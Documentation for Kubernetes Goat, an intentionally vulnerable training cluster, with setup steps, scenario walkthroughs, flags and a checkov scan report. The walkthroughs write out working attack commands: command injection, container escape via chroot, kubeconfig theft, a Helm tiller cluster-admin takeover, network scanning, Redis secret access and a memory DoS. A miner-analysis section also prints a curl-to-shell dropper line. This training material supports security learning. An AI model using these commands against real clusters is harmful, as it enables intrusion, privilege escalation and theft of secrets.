About Kubernetes Goat
Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security.
Disclaimer & Warnings
Kubernetes Goat creates intentionally vulnerable resources into your cluster. DO NOT deploy Kubernetes Goat in a production environment or alongside any sensitive cluster resources.
Kubernetes Goat Scenarios
- Sensitive keys in code bases
- DIND (docker-in-docker) exploitation
- SSRF in K8S world
- Container escape to access host system
- Docker CIS Benchmarks analysis
- Kubernetes CIS Benchmarks analysis
- Attacking private registry
- NodePort exposed services
- Helm v2 tiller to PwN the cluster
- Analysing crypto miner container
- Kubernetes Namespaces bypass
- Gaining environment information
- DoS the memory/cpu resources
- Hacker Container preview
Kubernetes Goat Architecture
TBD
Author
Kubernetes Goat was created by Madhu Akula
Madhu Akula is a security ninja, published author, and cloud native security researcher with extensive experience. He is an active member of the international security, DevOps, and cloud native communities (null, DevSecOps, AllDayDevOps, etc.) and holds industry certifications such as OSCP (Offensive Security Certified Professional) and CKA (Certified Kubernetes Administrator). Madhu frequently speaks and runs training sessions at security events and conferences around the world, including DEF CON (24, 26 & 27), Black Hat USA (2018 & 19), USENIX LISA (2018 & 19), O’Reilly Velocity EU 2019, GitHub Satellite 2020, AppSec EU (2018 & 19), All Day DevOps (2016, 17, 18, 19 & 20), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n (2017, 18), Nullcon (2018, 19), SACON 2019, Serverless Summit, null, and many others. His research has identified vulnerabilities in more than 200 companies and organizations, including Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, and Adobe, and he has been credited with multiple CVEs, acknowledgements, and rewards. He is co-author of Security Automation with Ansible 2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He also won first prize for building an infrastructure security monitoring solution at InMobi's flagship hackathon among 100+ engineering teams.
Learning Kubernetes
Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. - Wikipedia
What is Kubernetes - The Illustrated Children's Guide to Kubernetes
source: https://www.youtube.com/watch?v=4ht22ReBjno
Kubernetes Overview
Image source: Khtan66 CC BY-SA 4.0, from Wikimedia Commons
Resources to learn more about Kubernetes
Kubernetes Cluster Setup
Before we set up Kubernetes Goat, we need admin access to a working Kubernetes cluster.
There are many ways to run a Kubernetes cluster. Some of them include:
- Cloud provider Kubernetes service (like GKE, EKS, AKS, DO, etc.)
- Locally provisioned cluster
- Minikube environment
- Katacoda playground
Refer to the Kubernetes setup documentation for more information and details at https://kubernetes.io/docs/setup/
Kubernetes playground by Katacoda
https://katacoda.com/madhuakula/scenarios/kubernetes-goat
Google Kubernetes Engine (GKE) Setup
- Navigate to your Google Cloud console at https://console.cloud.google.com
- Choose the project in which you want to set up the Kubernetes cluster
- Then open Google Cloud Shell by clicking the terminal icon at the top right
Creating new GKE cluster
# Importing required environment variables
export KUBERNETES_GOAT_CLUSTER_NAME="kubernetes-goat"
export KUBERNETES_GOAT_REGION="us-central1"
export KUBERNETES_GOAT_CLUSTER_VERSION="1.16.8-gke.15"
export KUBERNETES_GOAT_PROJECT_NAME="<YOUR GOOGLE PROJECT ID>"
# Setup the GKE cluster
gcloud beta container --project "$KUBERNETES_GOAT_PROJECT_NAME" clusters create "$KUBERNETES_GOAT_CLUSTER_NAME" \
  --zone "$KUBERNETES_GOAT_REGION-a" --no-enable-basic-auth --cluster-version "$KUBERNETES_GOAT_CLUSTER_VERSION" \
  --machine-type "n1-standard-1" --image-type "UBUNTU" --disk-type "pd-standard" --disk-size "50" \
  --metadata disable-legacy-endpoints=true,GOAT_KEY="azhzLWdvYXQtNmJlNGRkMWI3ZmE4NGUzNzA0ODllZGQ2NDA0MWQ2MTk=" \
  --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" \
  --preemptible --num-nodes "2" --enable-stackdriver-kubernetes --enable-ip-alias \
  --network "projects/$KUBERNETES_GOAT_PROJECT_NAME/global/networks/default" \
  --subnetwork "projects/$KUBERNETES_GOAT_PROJECT_NAME/regions/$KUBERNETES_GOAT_REGION/subnetworks/default" \
  --default-max-pods-per-node "110" --enable-autoscaling --min-nodes "1" --max-nodes "5" \
  --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing \
  --no-enable-autoupgrade --no-enable-autorepair --maintenance-window "03:00"
# Get the GKE cluster credentials into Google Cloud Shell
gcloud container clusters get-credentials "$KUBERNETES_GOAT_CLUSTER_NAME" --zone "$KUBERNETES_GOAT_REGION-a" --project "$KUBERNETES_GOAT_PROJECT_NAME"
- Check the Kubernetes cluster access by running
kubectl version --short
Miscellaneous
- When you start a new project or create a Kubernetes cluster for the first time in GKE, it might take a while for the API to be enabled, so you might see the below error/message:
Kubernetes Engine API is being enabled. This may take a minute or more. Learn more
Kubernetes Goat Setup
This document explains the steps to set up the Kubernetes Goat in your Kubernetes Cluster.
Please do not set up Kubernetes Goat in your production workloads, as this is designed to be intentionally vulnerable.
Free online Kubernetes Goat playground
https://katacoda.com/madhuakula/scenarios/kubernetes-goat
Pre-requisites
- Ensure you have admin access to the Kubernetes cluster
- Refer to kubectl releases for binaries https://kubernetes.io/docs/tasks/tools/install-kubectl/
- Verify by running
kubectl version
- Ensure you have Helm version 2 set up in your path as helm2
- Refer to the Helm version 2 releases for binaries: https://github.com/helm/helm/releases
- Verify by running
helm2 version
Setting up Kubernetes Goat
- To set up the Kubernetes Goat resources in your cluster, run the following commands
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat
bash setup-kubernetes-goat.sh
Scenarios
Welcome to Kubernetes Goat Scenarios. This is the home for exploring your Kubernetes Goat scenarios, discovery, exploitation, attacks, endpoints, etc.
Ensure you have the kubectl and docker binaries installed on your host system to get the maximum out of this training platform. Follow each scenario by clicking on it.
Access the Kubernetes Goat environment resources
- Ensure the pods are in the Running state before running the access script
kubectl get pods
- Run the following script to access the environment
bash access-kubernetes-goat.sh
- Then navigate to http://127.0.0.1:1234
The flag format looks like
k8s-goat-2912d3d0b262bb16afbe450034089463
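Each flag is the literal prefix k8s-goat- followed by a hex string. If you want to sanity-check a captured candidate, here is a minimal shell sketch (the helper name is illustrative, and the suffix length is deliberately left flexible):

```shell
# Check whether a candidate string looks like a Kubernetes Goat flag:
# the literal prefix "k8s-goat-" followed by a lowercase hex string.
# (Helper name is illustrative; suffix length left flexible on purpose.)
is_goat_flag() {
  echo "$1" | grep -qE '^k8s-goat-[0-9a-f]+$'
}

is_goat_flag "k8s-goat-2912d3d0b262bb16afbe450034089463" && echo "looks like a flag"
```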
List of Scenarios
- Sensitive keys in code bases
- DIND (docker-in-docker) exploitation
- SSRF in K8S world
- Container escape to access host system
- Docker CIS Benchmarks analysis
- Kubernetes CIS Benchmarks analysis
- Attacking private registry
- NodePort exposed services
- Helm v2 tiller to PwN the cluster
- Analysing crypto miner container
- Kubernetes Namespaces bypass
- Gaining environment information
- DoS the memory/cpu resources
- Hacker Container preview
Sensitive keys in codebases
Scenario Information
Developers tend to commit sensitive information to version control systems. As we move towards CI/CD and GitOps systems, we tend to forget to identify sensitive information in code and commits. Let's see if we can find something cool here!
- To get started with the scenario, navigate to http://127.0.0.1:1230
Scenario Solution
Method 1
After reading the scenario description and application information, we performed some discovery and analysis and identified that the application has its .git folder exposed.
- Clone the git repository locally by running the following command. Ensure you have set up git-dumper locally before running the below command
python3 git-dumper.py http://localhost:1230/.git k8s-goat-git
- Now check the git log information
cd k8s-goat-git
git log
- Checkout an old commit for a specific version
git checkout 128029d89797957957b2a7198d8d159b239b34eb
ls -la
cat .env
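Checking out commits one by one works, but you can also sweep the whole dumped history for secret-looking assignments in one pass. A minimal sketch; the key-name patterns are illustrative, not specific to this repository:

```shell
# Scan a text stream (e.g. the output of `git log -p --all`) for
# secret-looking assignments. The pattern list is illustrative.
scan_for_secrets() {
  grep -iE '(api[_-]?key|secret|password|token)[[:space:]]*[:=]'
}

# Usage from inside the dumped repository:
# git log -p --all | scan_for_secrets
```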
Method 2
Sometimes we have access to the pods or containers themselves, so we can also perform the analysis from within the container.
export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh
- Then we can perform analysis on the .git folder by running utilities like trufflehog
trufflehog .
Miscellaneous
TBD
DIND (docker-in-docker) exploitation
Scenario Information
Most of the CI/CD and pipeline systems that use Docker and build containers for you within the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to the host system.
- To get started with the scenario, navigate to http://127.0.0.1:1231
Scenario Solution
- By looking at the application functionality, we identified that it has a command injection vulnerability
127.0.0.1; id
- After performing some analysis, we identified that there is a docker.sock mount available in the file system
;mount
- Download the docker static binary from the internet: https://download.docker.com/linux/static/stable/
;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz
- Extract the binary from the docker-19.03.9.tgz file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/
- Access the host system by running the following docker commands with docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images
Miscellaneous
TBD
SSRF in K8S world
Scenario Information
SSRF (Server-Side Request Forgery) has become the go-to attack for cloud native environments. In this scenario, we will see how we can exploit an application vulnerability like SSRF to gain access to cloud instance metadata as well as internal services' metadata.
- To get started with the scenario, navigate to http://127.0.0.1:1232
Scenario Solution
Based on the description, we know that this application is possibly vulnerable to SSRF. Let's go ahead and access the default instance metadata service using 169.254.169.254. Identify which cloud provider you are running this service in, then use provider-specific headers and queries.
- Let's also see which ports are running within the same pod/container. The endpoint is http://127.0.0.1:5000 and the method is GET
- Now we can see that there is an internal-only exposed service within the cluster called http://metadata-db
- After enumerating through the key values, we finally identified the flag at
http://metadata-db/latest/secrets/kubernetes-goat
- Decoding the base64 value returns the flag
k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab
echo -n "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d
Miscellaneous
TBD
Container escape to access the host system
Scenario Information
Most monitoring, tracing, and debugging software requires extra privileges and capabilities to run. In this scenario, we will see how a pod with extra capabilities and privileges, including a HostPath mount, allows us to gain access to the host system and use node-level configuration to achieve a complete cluster compromise.
- To get started with the scenario, navigate to http://127.0.0.1:1233
Scenario Solution
After performing the analysis, we identified that this container has complete privileges on the host system, allows privilege escalation, and has /host-system mounted from the host system.
ls /
ls /host-system/
- Gain access with the host system's privileges using chroot
chroot /host-system bash
docker ps
- Accessing the node level kubelet Kubernetes configuration
cat /var/lib/kubelet/kubeconfig
Download the kubectl locally to use this config and perform operations
- Use the kubelet configuration to query cluster-wide Kubernetes resources
kubectl --kubeconfig /var/lib/kubelet/kubeconfig get all -n kube-system
- From here we can go further by performing lateral movement and post exploitation
Miscellaneous
TBD
Docker CIS Benchmarks analysis
Scenario Information
This scenario is mainly to perform the Docker CIS benchmarks analysis on top of Kubernetes nodes to identify the possible security vulnerabilities.
- To get started with this scenario, you can either access the node and follow docker bench security manually, or run the following command to deploy docker bench security as a DaemonSet
kubectl apply -f scenarios/docker-bench-security/deployment.yaml
kubectl get daemonsets
Scenario Solution
- Access each docker-bench-security-xxxxx pod (one per node in your Kubernetes cluster) and run the Docker CIS benchmarks
kubectl exec -it docker-bench-security-xxxxx -- sh
cd docker-bench-security
- Run the Docker CIS benchmarks script
sh docker-bench-security.sh
- Now based on the vulnerabilities you see from the Docker CIS benchmarks, you can proceed with further exploitation
Miscellaneous
TBD
Kubernetes CIS Benchmarks analysis
Scenario Information
This scenario is mainly to perform the Kubernetes CIS benchmarks analysis on top of Kubernetes nodes to identify the possible security vulnerabilities.
- To get started with this scenario, you can either access the node and follow kube-bench manually, or run the following commands to deploy kube-bench as a Kubernetes job
kubectl apply -f scenarios/kube-bench-security/node-job.yaml
kubectl apply -f scenarios/kube-bench-security/master-job.yaml
Scenario Solution
- Now go ahead and get the jobs list and pods information by running the below commands
kubectl get jobs
kubectl logs -f kube-bench-node-xxxxx
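kube-bench marks each check result with a prefix such as [PASS], [WARN], [INFO], or [FAIL], so the failing checks can be filtered straight out of the job logs. A minimal sketch:

```shell
# Keep only the failing checks from kube-bench output, which marks each
# result line with [PASS], [WARN], [INFO], or [FAIL].
failed_checks() {
  grep -E '^\[FAIL\]'
}

# Usage:
# kubectl logs kube-bench-node-xxxxx | failed_checks
```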
- Now based on the vulnerabilities you see from the Kubernetes CIS benchmarks, you can proceed with further exploitation
Miscellaneous
TBD
Attacking private registry
Scenario Information
A container registry is the place where all container images get pushed. Most of the time each organization has its own private registry, but sometimes it ends up misconfigured and publicly open. Meanwhile, developers assume the registry is internal-only and end up storing all kinds of sensitive information inside the container images. Let's see what we can find here.
- To get started with the scenario, navigate to http://127.0.0.1:1235
Scenario Solution
As this is an intentionally vulnerable design, we provided the endpoint directly. In the real world, you would have to do some recon.
- Based on the scenario and information, we identified that it's possibly a private Docker container registry
- After reading some docs and googling, here are simple API endpoint queries for the container registry
curl http://127.0.0.1:1235/v2/
curl http://127.0.0.1:1235/v2/_catalog
- Get more information about the images inside the registry from the API using the below query
curl http://127.0.0.1:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest
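A schema-1 manifest embeds the image config (including its environment) as escaped JSON inside its v1Compatibility fields, so a grep over the response can surface ENV entries without pulling the image. A rough sketch; the filter assumes that manifest layout:

```shell
# Pull "Env":[...] fragments out of a registry manifest response.
# Handles both plain and backslash-escaped JSON quoting, as found in the
# v1Compatibility blobs of schema-1 manifests.
extract_env() {
  grep -oE '\\?"Env\\?":\[[^]]*\]'
}

# Usage:
# curl -s http://127.0.0.1:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest | extract_env
```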
- Now we can observe that the Docker image has an ENV variable with API key information
This can be taken a little further by using the docker client to download the images locally for analysis. In some cases, you can even push images to the registry, depending on the permissions and privileges
Miscellaneous
TBD
NodePort exposed services
Scenario Information
If a user exposes a service within the Kubernetes cluster as a NodePort, and the nodes running the cluster don't have any firewall/network restrictions, anyone can reach that service. This can leave unauthenticated and unauthorized services exposed.
- To get started with the scenario, run the following command and look for open ports in the Kubernetes Nodes
kubectl get nodes -o wide
When Kubernetes creates a NodePort service, it allocates a port from a range specified in the flags that define your Kubernetes cluster. (By default, these are ports ranging from 30000-32767.)
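That default range means a port sweep only needs to cover 30000-32767. A small helper to check whether a discovered port falls in the default range (a sketch; clusters can override this via the apiserver's --service-node-port-range flag):

```shell
# True when the port falls inside Kubernetes' default NodePort range
# (30000-32767). Clusters may configure a different range.
in_nodeport_range() {
  [ "$1" -ge 30000 ] && [ "$1" -le 32767 ]
}

in_nodeport_range 30003 && echo "30003 is a likely NodePort"
```

With Nmap, the same idea translates to restricting the sweep, e.g. nmap -p 30000-32767 EXTERNAL-IP-ADDRESS.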
Scenario Solution
- Get the list of Kubernetes nodes external IP addresses information
kubectl get nodes -o wide
- Now, let's find the open port. In this case, you can use traditional security scanning utilities like Nmap
- Once we have identified that there is a NodePort exposed, we can verify it by connecting to it
nc -zv EXTERNAL-IP-ADDRESS 30003
This vulnerability/attack varies depending on how the Kubernetes cluster has been configured
Miscellaneous
TBD
Helm v2 tiller to PwN the cluster
Scenario Information
Helm is a package manager for Kubernetes. It's like apt-get for Ubuntu. In this scenario, we will see how the older version of Helm (version 2) and the default tiller service RBAC setup can be used to gain access to the complete cluster.
- To get started with the scenario, run the following command
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash
Scenario Solution
- By default, the Helm version 2 tiller deployment has RBAC with full cluster administrator privileges
- The default installation is in the kube-system namespace, with the service name tiller-deploy and port 44134 exposed to 0.0.0.0. We can verify this by running a telnet command
telnet tiller-deploy.kube-system 44134
- Now that we are able to connect to the tiller service port, we can use the helm binary to perform operations and talk to the tiller service
helm --host tiller-deploy.kube-system:44134 version
- Let's try to get Kubernetes secrets from the cluster's kube-system namespace
kubectl get secrets -n kube-system
- Now we can create our own helm chart to grant the default service account full cluster admin access, since by default the current pod is deployed in the default namespace and uses the default service account
helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart
- Now that pwnchart has been deployed, it has given all default service accounts cluster admin access. Let's try getting the kube-system namespace secrets again
kubectl get secrets -n kube-system
This scenario varies based on how the tiller deployment has been performed; sometimes admins deploy tiller to a specific namespace with specific privileges. Also, from Helm version 3 onwards there is no tiller service, which mitigates such vulnerabilities
Miscellaneous
TBD
Analysing crypto miner container
Scenario Information
Crypto mining has become popular with modern infrastructure, and environments like Kubernetes are an especially easy target, as you might not even look at what exactly a container image is built upon or what it is doing without proactive monitoring. In this scenario, we will analyse and identify the crypto miner.
- To get started, identify all the resources/images in the Kubernetes cluster. Including Jobs.
kubectl get jobs
Scenario Solution
Identify all resources within the Kubernetes cluster. If possible, also get into the details of each container image available on all the nodes within the cluster
- Once we have identified the job running in the Kubernetes cluster, we get the pod information by running the following command
kubectl describe job batch-check-job
- Then get the pod information by running the below command
kubectl get pods --namespace default -l "job-name=batch-check-job"
- Then get the pod manifest and analyse it
kubectl get pod batch-check-job-xxxx -o yaml
- We identified that it's running the madhuakula/k8s-goat-batch-check docker image
- After analysing this image, we identified that it has the mining stuff in a build-time script in one of the layers
docker history --no-trunc madhuakula/k8s-goat-batch-check
echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup
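Download-and-execute lines like the one above can be surfaced mechanically by grepping the image history for fetch-then-shell patterns. A rough first-pass filter; the pattern is illustrative and will miss obfuscated droppers:

```shell
# Flag history entries that fetch something with curl/wget and feed
# output to a shell -- a common cryptominer-dropper pattern.
# Illustrative heuristic only; obfuscated payloads will evade it.
suspicious_layers() {
  grep -iE '(curl|wget).*\|[[:space:]]*(sh|bash)'
}

# Usage:
# docker history --no-trunc madhuakula/k8s-goat-batch-check | suspicious_layers
```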
Miscellaneous
TBD
Kubernetes Namespaces bypass
Scenario Information
By default, Kubernetes uses a flat networking schema, which means any pod/service within the cluster can talk to any other. The namespaces within the cluster don't have any network security restrictions by default; anyone in one namespace can talk to any other namespace. We heard that Kubernetes Goat loves cache. Let's see if we can gain access to other namespaces
- To get started with the scenario, let's run our awesome hacker-container in the default namespace
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh
Scenario Solution
- Get the cluster IP range information
ip route
ifconfig
printenv
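One way to pick a scan range is to derive it from the service host variable Kubernetes injects into every pod. A minimal sketch; the /16 width is an assumption about the cluster's CIDR and may need adjusting:

```shell
# Derive a broad scan range from the injected KUBERNETES_SERVICE_HOST
# variable. The /16 width is a guess; tune it to your cluster's CIDR.
scan_range() {
  echo "$KUBERNETES_SERVICE_HOST" | awk -F. '{print $1 "." $2 ".0.0/16"}'
}

# Usage:
# zmap -p 6379 "$(scan_range)" -o results.csv
```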
- Based on our analysis/understanding of the system, we can run an internal scan of the entire cluster range using zmap
zmap -p 6379 10.0.0.0/8 -o results.csv
There is also another way to access services/pods in Kubernetes, using DNS names of the form servicename.namespace
- Let's access redis using the redis-cli client
redis-cli -h 10.12.0.2
KEYS *
GET SECRETSTUFF
There are many other services and resources exposed within the cluster, like Elasticsearch, Mongo, etc. So if your recon skills are good, you've got a gold mine here.
Miscellaneous
TBD
Gaining environment information
Scenario Information
Each environment in Kubernetes will have a lot of information to share. Some of the key things include secrets, api keys, configs, services, and a lot more. So let's go ahead and find the vault key!
- To get started with the scenario, navigate to http://127.0.0.1:1233
Scenario Solution
- Go ahead and explore the system as you would a generic Linux system
cat /proc/self/cgroup
cat /etc/hosts
mount
ls -la /home/
- Get the environment variables, including mounted Kubernetes secrets like K8S_GOAT_VAULT_KEY=k8s-goat-cd2da27224591da2b48ef83826a8a6c, as well as service names, ports, etc.
printenv
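Kubernetes also injects discovery variables of the form <SERVICE>_SERVICE_HOST / <SERVICE>_SERVICE_PORT for every service visible to the pod, so filtering the environment is a quick way to map neighbouring services. A minimal sketch:

```shell
# List the service discovery variables Kubernetes injects into pods:
# <SERVICE>_SERVICE_HOST and <SERVICE>_SERVICE_PORT entries.
list_service_vars() {
  printenv | grep -E '_SERVICE_(HOST|PORT)='
}
```

Each matching line names an in-cluster service and where to reach it.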
Miscellaneous
TBD
DoS the memory/CPU resources
Scenario Information
There are no resource specifications in the Kubernetes manifests and no limit ranges applied to the containers. As an attacker, we can consume all the resources of the node where the pod/deployment is running, starving other workloads and causing a DoS for the environment.
- To get started with the scenario, navigate to http://127.0.0.1:1236
Scenario Solution
- This deployment's pod has no resource limits set in the Kubernetes manifests, so we can easily perform operations that consume resources
- In this pod we have installed a utility called stress-ng
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
- You can see the difference in resource usage while stress-ng is running and after it finishes
kubectl top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
This attack may not work in some cases like autoscaling, resource restrictions, etc.
Miscellaneous
TBD
Hacker Container preview
Scenario Information
This scenario is just an exploration of the common security utilities inside the Kubernetes Cluster environment. I think by this time you might have already used hacker-container multiple times.
- To get started with this scenario. Run the hacker container using the below command
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh
Scenario Solution
Hacker Container is a utility with a list of useful tools/commands for hacking Kubernetes clusters, so there is no limit to your exploration of Kubernetes environments. Here we will see some of the most useful and powerful utilities
- Container introspection utility to get an overview of the system capabilities, etc.
amicontained
- Performing Nikto scan against internal services
nikto.pl -host http://metadata-db
There are many other use cases. To get the maximum out of hacker-container, we can use it with host privileges, volumes, processes, etc. This will be updated soon with more details.
Miscellaneous
TBD
Teardown Kubernetes Goat
- Teardown the entire Kubernetes Goat infrastructure
bash teardown-kubernetes-goat.sh
Note: Ensure you clean up what you installed and used; it's better to delete the cluster.
Security Scanning Reports
This section contains security scanning reports produced by multiple open source security tools scanning the Kubernetes Goat infrastructure.
checkov report for Kubernetes Goat
To identify all of the 232 Kubernetes configuration issues, run checkov by Bridgecrew
https://twitter.com/BarakSchoster/status/1273170904894377985
index | check_id | file | resource | check_name |
---|---|---|---|---|
0 | CKV_K8S_31 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Ensure that the seccomp profile is set to docker/default or runtime/default |
1 | CKV_K8S_40 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Containers should run as a high UID to avoid host conflict |
2 | CKV_K8S_29 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Apply security context to your pods and containers |
3 | CKV_K8S_38 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Ensure that Service Account Tokens are only mounted where necessary |
4 | CKV_K8S_23 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Minimize the admission of root containers |
5 | CKV_K8S_37 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Minimize the admission of containers with capabilities assigned |
6 | CKV_K8S_8 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Liveness Probe Should be Configured |
7 | CKV_K8S_12 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Memory requests should be set |
8 | CKV_K8S_20 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Containers should not run with allowPrivilegeEscalation |
9 | CKV_K8S_13 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Memory limits should be set |
10 | CKV_K8S_10 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | CPU requests should be set |
11 | CKV_K8S_22 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Use read-only filesystem for containers where possible |
12 | CKV_K8S_9 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Readiness Probe Should be Configured |
13 | CKV_K8S_28 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Minimize the admission of containers with the NET_RAW capability |
14 | CKV_K8S_30 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Apply security context to your pods and containers |
15 | CKV_K8S_14 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Image Tag should be fixed - not latest or blank |
16 | CKV_K8S_43 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Image should use digest |
17 | CKV_K8S_11 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | CPU limits should be set |
18 | CKV_K8S_31 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
19 | CKV_K8S_40 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Containers should run as a high UID to avoid host conflict |
20 | CKV_K8S_29 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Apply security context to your pods and containers |
21 | CKV_K8S_38 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
22 | CKV_K8S_21 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | The default namespace should not be used |
23 | CKV_K8S_23 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Minimize the admission of root containers |
24 | CKV_K8S_21 | /scenarios/build-code/deployment.yaml | Service.build-code-service.default | The default namespace should not be used |
25 | CKV_K8S_37 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
26 | CKV_K8S_8 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Liveness Probe Should be Configured |
27 | CKV_K8S_12 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Memory requests should be set |
28 | CKV_K8S_20 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
29 | CKV_K8S_10 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | CPU requests should be set |
30 | CKV_K8S_22 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Use read-only filesystem for containers where possible |
31 | CKV_K8S_9 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Readiness Probe Should be Configured |
32 | CKV_K8S_28 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
33 | CKV_K8S_30 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Apply security context to your pods and containers |
34 | CKV_K8S_14 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
35 | CKV_K8S_43 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Image should use digest |
36 | CKV_K8S_31 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
37 | CKV_K8S_27 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Do not expose the docker daemon socket to containers |
38 | CKV_K8S_40 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should run as a high UID to avoid host conflict |
39 | CKV_K8S_19 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host network namespace |
40 | CKV_K8S_17 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host process ID namespace |
41 | CKV_K8S_18 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host IPC namespace |
42 | CKV_K8S_38 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Ensure that Service Account Tokens are only mounted where necessary |
43 | CKV_K8S_21 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | The default namespace should not be used |
44 | CKV_K8S_23 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Minimize the admission of root containers |
45 | CKV_K8S_37 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with capabilities assigned |
46 | CKV_K8S_8 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Liveness Probe Should be Configured |
47 | CKV_K8S_20 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Containers should not run with allowPrivilegeEscalation |
48 | CKV_K8S_16 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Container should not be privileged |
49 | CKV_K8S_22 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Use read-only filesystem for containers where possible |
50 | CKV_K8S_9 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Readiness Probe Should be Configured |
51 | CKV_K8S_28 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
52 | CKV_K8S_25 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with added capability |
